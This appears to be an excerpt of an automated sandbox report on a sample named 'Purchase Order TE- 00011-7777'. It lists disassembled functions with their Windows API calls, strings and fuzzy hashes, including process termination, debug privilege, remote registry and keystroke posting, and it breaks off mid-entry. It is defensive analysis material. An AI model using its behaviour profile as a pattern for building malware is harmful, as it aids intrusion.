                      Function 00AE9A66 Relevance: 13.7, APIs: 9, Instructions: 247networkCOMMON
                      Download Yara Rule
                      APIs
                      • select.WSOCK32 ref: 00AE9B38
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE9B45
                      • __WSAFDIsSet.WSOCK32(00000000,?), ref: 00AE9B6F
                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00AE9B90
                      • WSAGetLastError.WSOCK32(00000000), ref: 00AE9B9F
                      • htons.WSOCK32(?), ref: 00AE9C51
                      • inet_ntoa.WSOCK32(?), ref: 00AE9C0C
                        • Part of subcall function 00ACE0F5: _strlen.LIBCMT ref: 00ACE0FF
                        • Part of subcall function 00ACE0F5: _memmove.LIBCMT ref: 00ACE121
                      • _strlen.LIBCMT ref: 00AE9CA7
                      • _memmove.LIBCMT ref: 00AE9D10
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                      • String ID:
                      • API String ID: 3637404534-0
                      • Opcode ID: 62fc30a5349f576cc0ab824b2ec18c38bfd16360e292ebb7ef2a6f0440eb1574
                      • Instruction ID: b4fa80dfec5f76868598a65483cac54477ecf3a6275f9f7eb1ab3521c8d6c30a
                      • Opcode Fuzzy Hash: 62fc30a5349f576cc0ab824b2ec18c38bfd16360e292ebb7ef2a6f0440eb1574
                      • Instruction Fuzzy Hash: B4819C71604340AFDB10EF25CD85EABB7E9EB89724F104629F5559B291DB30D904CBA2
                      Function 00AFB14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                      Download Yara Rule
                      APIs
                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00AFB204
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InvalidateRect
                      • String ID:
                      • API String ID: 634782764-0
                      • Opcode ID: 25610beaff662dceb5732fa8569442fdea0accaf27cf388a97d34d3424a59d70
                      • Instruction ID: 7f75955480972c64c41f7c6049aa96c499d0e740e4b2df62bc3fb8ae81b4a7c4
                      • Opcode Fuzzy Hash: 25610beaff662dceb5732fa8569442fdea0accaf27cf388a97d34d3424a59d70
                      • Instruction Fuzzy Hash: FE51A13066021CBEEB309FA8CC85BBE7B75AB06350F204615FB15DB5E1C771E9508B64
                      Function 00AAA599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B0E9EA
                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B0EA0B
                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B0EA20
                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B0EA3D
                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B0EA64
                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00AAA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B0EA6F
                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B0EA8C
                      • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00AAA57C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00B0EA97
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                      • String ID:
                      • API String ID: 1268354404-0
                      • Opcode ID: 50884457f44ed24f9986a7e601f337ae8658a454f53dc0c4086785f6602cd811
                      • Instruction ID: 57aceb0c7e07f0662213e95c792272152540948dd5cbb3202d849510ec5e2d1e
                      • Opcode Fuzzy Hash: 50884457f44ed24f9986a7e601f337ae8658a454f53dc0c4086785f6602cd811
                      • Instruction Fuzzy Hash: 1B515770A00209AFDB24CF69CC81FAA7BF5EB59750F104A59F956972D0DBB0ED80DB60
                      Function 00AAF6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                      Download Yara Rule
                      APIs
                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00AAF737
                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00AAF77E
                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00B0EB55
                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00B0E9A0,00000004,00000000,00000000), ref: 00B0EBC1
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ShowWindow
                      • String ID:
                      • API String ID: 1268545403-0
                      • Opcode ID: 79cbbdc819f8bea4add073070430d417a922ec21ef3ce46d834431b2150aa642
                      • Instruction ID: df0dcffc298678caf1c80a9b92af6f2227e4891618a140eab96642f0acfbb366
                      • Opcode Fuzzy Hash: 79cbbdc819f8bea4add073070430d417a922ec21ef3ce46d834431b2150aa642
                      • Instruction Fuzzy Hash: E141D9312046809EDB3D47B88DC8B7A7BE5AB47301F684CADE09B435E1CB71E880D721
                      Function 00ACCDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00ACE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ACE158
                        • Part of subcall function 00ACE138: GetCurrentThreadId.KERNEL32 ref: 00ACE15F
                        • Part of subcall function 00ACE138: AttachThreadInput.USER32(00000000,?,00ACCDFB,?,00000001), ref: 00ACE166
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ACCE06
                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00ACCE23
                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00ACCE26
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ACCE2F
                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00ACCE4D
                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ACCE50
                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00ACCE59
                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00ACCE70
                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00ACCE73
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                      • String ID:
                      • API String ID: 2014098862-0
                      • Opcode ID: a1ffdcd1d4821266f8f7388c74860cf9b02bdce620655509edc87d59e7117e99
                      • Instruction ID: 6146d723a564cdd1cb7c7a010ecaa370ff78a1db42ab2aed9e4d5a956a17950c
                      • Opcode Fuzzy Hash: a1ffdcd1d4821266f8f7388c74860cf9b02bdce620655509edc87d59e7117e99
                      • Instruction Fuzzy Hash: AA1104B1550618BEF7106F648C8EFAA3B2DDB18754F910419F3406B0E0CDF2AC109AA4
                      Function 00AEC8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID:
                      • String ID: NULL Pointer assignment$Not an Object type
                      • API String ID: 0-572801152
                      • Opcode ID: 1bfb6761f2e6a268081f7eeca87887ead2195a135e7bce732c8717f21076a037
                      • Instruction ID: c2c6e97f04fe03f06f7aaeb87a80c18363bc3e817bd557c4db35e651b07584fd
                      • Opcode Fuzzy Hash: 1bfb6761f2e6a268081f7eeca87887ead2195a135e7bce732c8717f21076a037
                      • Instruction Fuzzy Hash: 70E1D471A00259AFDF10DFA9C981BEE77B9FF48364F148069F949AB281D7709D42CB90
                      Function 00AF9882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00AF9926
                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00AF993A
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00AF9954
                      • _wcscat.LIBCMT ref: 00AF99AF
                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00AF99C6
                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00AF99F4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$Window_wcscat
                      • String ID: SysListView32
                      • API String ID: 307300125-78025650
                      • Opcode ID: 998e27df25b0151c20e9461d28969ff0c13d610737ae6f512c49347a28894de4
                      • Instruction ID: a834b7e2d046a5318cc4b42bf36702deff419b172d37067c20aacf2e6c97db37
                      • Opcode Fuzzy Hash: 998e27df25b0151c20e9461d28969ff0c13d610737ae6f512c49347a28894de4
                      • Instruction Fuzzy Hash: 0841A171900308ABEF219FA4C885FEF77E8EF09350F10446AF689A7291D7719D848B60
                      Function 00AF1620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AD6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00AD6F7D
                        • Part of subcall function 00AD6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00AD6F8D
                        • Part of subcall function 00AD6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00AD7022
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AF168B
                      • GetLastError.KERNEL32 ref: 00AF169E
                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00AF16CA
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00AF1746
                      • GetLastError.KERNEL32(00000000), ref: 00AF1751
                      • CloseHandle.KERNEL32(00000000), ref: 00AF1786
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                      • String ID: SeDebugPrivilege
                      • API String ID: 2533919879-2896544425
                      • Opcode ID: bcd9305a1cd1b8cb63fc5f1265775635fd1f625700044c8339888bd7bd605354
                      • Instruction ID: 3a351b84af91f0353693e7153c2533541ba135316923ef816ce6f625d58f76c6
                      • Opcode Fuzzy Hash: bcd9305a1cd1b8cb63fc5f1265775635fd1f625700044c8339888bd7bd605354
                      • Instruction Fuzzy Hash: A0418B75700206AFDB04EF94CAA6FBDB7E5AF54714F048049FA0A9F292DB799804CF51
                      Function 00AD6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadIconW.USER32(00000000,00007F03), ref: 00AD62D6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: IconLoad
                      • String ID: blank$info$question$stop$warning
                      • API String ID: 2457776203-404129466
                      • Opcode ID: 10a0fd68dd753fa19976bd80cc453a2c2b7fcfc1770ca04d1f707fc4aaf32308
                      • Instruction ID: 328f334f0b1f2384aeb29d9cb4a56f45096ccb1924b5852a1c52e824afaf9d9a
                      • Opcode Fuzzy Hash: 10a0fd68dd753fa19976bd80cc453a2c2b7fcfc1770ca04d1f707fc4aaf32308
                      • Instruction Fuzzy Hash: BF112C31A0C343BAE7055B55DC92DEA73EC9F1A724B20002BF502A63C3FBF4AB414564
                      Function 00AD757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00AD7595
                      • LoadStringW.USER32(00000000), ref: 00AD759C
                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00AD75B2
                      • LoadStringW.USER32(00000000), ref: 00AD75B9
                      • _wprintf.LIBCMT ref: 00AD75DF
                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00AD75FD
                      Strings
                      • %s (%d) : ==> %s: %s %s, xrefs: 00AD75DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString$Message_wprintf
                      • String ID: %s (%d) : ==> %s: %s %s
                      • API String ID: 3648134473-3128320259
                      • Opcode ID: 3d116df02c6537f488563a2e3689af6e12dab70ab9f0a8b13d5dc6644a866eda
                      • Instruction ID: 9f03e54900a94d92f1814d6e68b1f6d4569e508db931165e686a3cd74456045a
                      • Opcode Fuzzy Hash: 3d116df02c6537f488563a2e3689af6e12dab70ab9f0a8b13d5dc6644a866eda
                      • Instruction Fuzzy Hash: 7A0136F6500208BFE711A794ED89EEB776CDB04301F4044A6B746E3041EE789E848B75
                      Function 00AF2A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                        • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF2AE7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: BuffCharConnectRegistryUpper_memmove
                      • String ID:
                      • API String ID: 3479070676-0
                      • Opcode ID: dfae109945b13e47e4ec5b5fa8a9a4e997d9f2b18844c8f645b2878eca5a0b0c
                      • Instruction ID: 8e307017b5c0169325279f3ea7063b7058538ed28f39ecf4a8fc635d859abb40
                      • Opcode Fuzzy Hash: dfae109945b13e47e4ec5b5fa8a9a4e997d9f2b18844c8f645b2878eca5a0b0c
                      • Instruction Fuzzy Hash: BD917831604205AFCB01EF94C995B6EB7E5FF88314F14881DFA969B2A1DB34E946CF42
                      Function 00ABB72C Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • __mtinitlocknum.LIBCMT ref: 00ABB744
                        • Part of subcall function 00AB8A0C: __FF_MSGBANNER.LIBCMT ref: 00AB8A21
                        • Part of subcall function 00AB8A0C: __NMSG_WRITE.LIBCMT ref: 00AB8A28
                        • Part of subcall function 00AB8A0C: __malloc_crt.LIBCMT ref: 00AB8A48
                      • __lock.LIBCMT ref: 00ABB757
                      • __lock.LIBCMT ref: 00ABB7A3
                      • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00B46948,00000018,00AC6C2B,?,00000000,00000109), ref: 00ABB7BF
                      • EnterCriticalSection.KERNEL32(8000000C,00B46948,00000018,00AC6C2B,?,00000000,00000109), ref: 00ABB7DC
                      • LeaveCriticalSection.KERNEL32(8000000C), ref: 00ABB7EC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                      • String ID:
                      • API String ID: 1422805418-0
                      • Opcode ID: f1c013a187fcda308c135b248f298d8341d1ca38e5e834cda918700883466e0e
                      • Instruction ID: a889a091190f0adf331888e4233a28f30e17370c6a723ade7a01763c0c99e4a6
                      • Opcode Fuzzy Hash: f1c013a187fcda308c135b248f298d8341d1ca38e5e834cda918700883466e0e
                      • Instruction Fuzzy Hash: 3F412471D213159BEB10AFACD9443ECB7ACBF41325F108219E425AB2D3CBB59940CBA0
                      Function 00ADA1B7 Relevance: 12.1, APIs: 8, Instructions: 100fileCOMMON
                      Download Yara Rule
                      APIs
                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00ADA1CE
                        • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                        • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00ADA205
                      • EnterCriticalSection.KERNEL32(?), ref: 00ADA221
                      • _memmove.LIBCMT ref: 00ADA26F
                      • _memmove.LIBCMT ref: 00ADA28C
                      • LeaveCriticalSection.KERNEL32(?), ref: 00ADA29B
                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00ADA2B0
                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00ADA2CF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                      • String ID:
                      • API String ID: 256516436-0
                      • Opcode ID: b5bf92fb36f2ed7f745897dff85ff462bf5110bde03b3575234e8a3e0bdeb124
                      • Instruction ID: 4cbb1d92f47726e9ea864de675f12f48f7c8e802c2c1bd6852bbc98d0fe7036a
                      • Opcode Fuzzy Hash: b5bf92fb36f2ed7f745897dff85ff462bf5110bde03b3575234e8a3e0bdeb124
                      • Instruction Fuzzy Hash: 4B317031A00105ABCB00EFA9DD85EEEBBB8EF45310B5480A5F905AB256DB74DE14CBA1
                      Function 00AF8CDB Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                      Download Yara Rule
                      APIs
                      • DeleteObject.GDI32(00000000), ref: 00AF8CF3
                      • GetDC.USER32(00000000), ref: 00AF8CFB
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AF8D06
                      • ReleaseDC.USER32(00000000,00000000), ref: 00AF8D12
                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00AF8D4E
                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00AF8D5F
                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00AFBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00AF8D99
                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00AF8DB9
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                      • String ID:
                      • API String ID: 3864802216-0
                      • Opcode ID: 0a9fac2d7c0c8c652c07b7cf1ef0bf2c04f2162890e5481f4ac3f0b2c8bd83bd
                      • Instruction ID: e3b1133dbd3f807fe67193caeca3fffec1096b70861e54c0625f0b30f17257ba
                      • Opcode Fuzzy Hash: 0a9fac2d7c0c8c652c07b7cf1ef0bf2c04f2162890e5481f4ac3f0b2c8bd83bd
                      • Instruction Fuzzy Hash: 01314C72201614BFEB118F51CC8AFEA3BA9EF49755F448065FE08DB191DBB99841CB70
                      Function 00AE1BFA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                        • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                      • _wcstok.LIBCMT ref: 00AE1D6E
                      • _wcscpy.LIBCMT ref: 00AE1DFD
                      • _memset.LIBCMT ref: 00AE1E30
                      Strings
                      Memory Dump Source
